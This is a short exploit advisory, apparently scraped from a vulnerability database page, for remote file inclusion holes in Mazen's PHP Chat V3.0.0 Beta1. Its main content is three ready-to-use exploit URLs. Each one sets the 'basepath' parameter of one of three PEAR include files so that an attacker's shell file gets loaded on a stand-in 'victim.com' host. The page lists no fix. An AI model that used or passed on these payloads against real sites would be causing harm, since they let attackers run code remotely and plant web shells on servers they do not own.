Mazens PHP Chat V3 (basepath) Remote File Inclusion Vulnerabilities

2007-05-26 00:00:00

#Mazen's PHP Chat V3.0.0 Beta1 Remote file inclusion

#Download script : http://www.scriptbrasil.com.br/script/php/bate_papo/mazen_phpopenchmt221.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/[chat_path]/include/pear/ITX.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT.php?basepath= shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.